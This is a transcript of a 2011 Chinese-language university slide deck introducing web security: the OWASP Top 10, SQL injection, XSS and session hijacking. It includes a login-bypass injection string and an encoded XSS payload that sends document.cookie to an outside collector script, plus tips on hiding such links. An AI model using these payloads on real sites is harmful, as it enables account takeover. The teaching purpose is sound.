Presentation is loading. Please wait.

Presentation is loading. Please wait.

中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程 網頁應用程式的安全入門 日期 : 2011/03/27 講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com.

Similar presentations


Presentation on theme: "中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程 網頁應用程式的安全入門 日期 : 2011/03/27 講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com."— Presentation transcript:

1 中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程 網頁應用程式的安全入門 日期 : 2011/03/27 講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com

2 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 2

3 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 3

4 不要做壞事! 4

5 不要被抓到! 5

6 6

7 不要說我教的 7

8 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 8

9 網頁安全? 早年 vs 現代 靜態 vs 動態 有程式 就有漏洞 ! 9

10 ways to attack OS web server web application 10

11 attack scenarios attack web server gain privilege steal informations to attack users attack other user steal informations execute other attacks may be composite 11

12 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 12

13 13

14 OWASP Top A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) 14

15 OWASP Top A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards 15

16 OWASP Top A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) 16

17 OWASP Top A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards 17

18 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 18

19 Injections 駭客的填空遊戲 where can attacker inject? database (MySQL, MS SQL, PostgreSQL... ) no-sql Directory Service (LDAP) system command!! 19

20 how SQL works in web login page for example client web server sql server request whit id and pwd select from account where `id`=id and `pwd`=pwd return result return login success/failed 20

21 Why SQL? 廣大使用 儲存大量的網站資料 injection friendly 21

22 how injections work? 以 MySQL 為例子 $query = “select from account where `id`=’$id’ and `pwd`=’$pwd’ $id=’ or 1=1 -- > select from account where `id`=’’

23 attack skills union blind attack 23

24 影響 資料被偷 / 被改 獲得網站權限 整個網站被拿下 # 24

25 how to defense safe API 過濾逃脫字元 不要直接把使用者輸入加入 query 找程式掃描弱點 25

26 Practice 26

27 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 27

28 XSS Cross Site Scripting 在別人的網站上寫程式! 28

29 background knowledge HTTP GET HTTP POST 29

30 how to attack attack using POST/GET the “scripting” in the server strange url 30

31 how to attack javascript / 31

32 example alert(“i’m Orange”) 32

33 what may happened? take you to bad site send your information to attacker Just For Fun! 33

34 Just For Fun Samy MySpace XSS attack Samy is my hero! Infection 34

35 Big Site also XSSable MySpace Facebook twitter Plurk... 35

36 how to defense for server 該逃的還是要逃 找程式掃描弱點 for user 看到奇怪連結要警覺 瀏覽器 / 防毒軟體 36

37 practice 37

38 Agenda 嘴砲 OWSAP Top 10 SQL injection XSS cookie & session 38

39 background knowledge cookie session A cookie is a piece of text stored by a user's web browser.text's wser. A cookA cookie can be used for authentication, storing site preferences,ring site pref shopping cart contents, the identifier for a server-based session,ifier for a s or anything else that can be accomplished through storing text data.ished t The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The "storage" of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases. 39

40 40

41 41

42 如果偷到了 cookie 可以

43 how to steal it? 43

44 44

45 把 cookie 送到雲端 ! 用 GET / POST 方式讓網頁把 cookie 送走 / ex: [" "].join(http://in1.ncu.cc/~ /keke/t.php?t= sever side is simple just keep the cookie 45

46 哪個白痴 會點這鬼連結 2,115,114,99,61,39,104,116,116,112,58,47,47,105,110,49,46,110,99,117,46,99,99,47,126,57,55,53,48,48,50,48,54,51,47, 107,101,107,101,47,116,46,112,104,112,63,116,61,34%29,document.cookie,String.fromCharCode%2834,39,62%29].join %28%29%29;%3C/script%3E%3C%22 46

47 hidden 有種東西叫短網址 (tinyurl.com / 0rz.tw / goo.gl / bit.ly) 塞進別的網頁裡 (ex: iframe 長寬設 0 或 1) ugly url EVERY WHERE https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fm ail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1eic6yu9oa4y3&scc=1<mpl=default<mplcache=2 https://login.yahoo.com/config/login?.intl=tw&.pd=c%3d7pP3Kh2p2e4XklntZWWfDLAC8w-- &.done=https://tw.login.yahoo.com/cgi-bin/kcookie.cgi/www/http%3a//tw.yahoo.com&rl=1 47

48 防範 鎖定 user agent / header 綁 IP * 不要被攻擊成功 * 48

49 鎖定 user agent / header if (isset($_SESSION['HTTP_USER_AGENT'])){ if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { exit(); }}else{ $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);} 但是... 當你偷的到 cookie 會拿不到 header 嗎 ? 49

50 Practice 50

51 Q&A? 51

52 end 52

53 Reference hhttp://goo.gl/IwGbX


Download ppt "中央大學電子計算機中心 「多媒體與網路應用」 資訊推廣課程 網頁應用程式的安全入門 日期 : 2011/03/27 講師 : 資工三 張竟 cwebb [dot] tw [at] gmail [dot] com."

Similar presentations


Ads by Google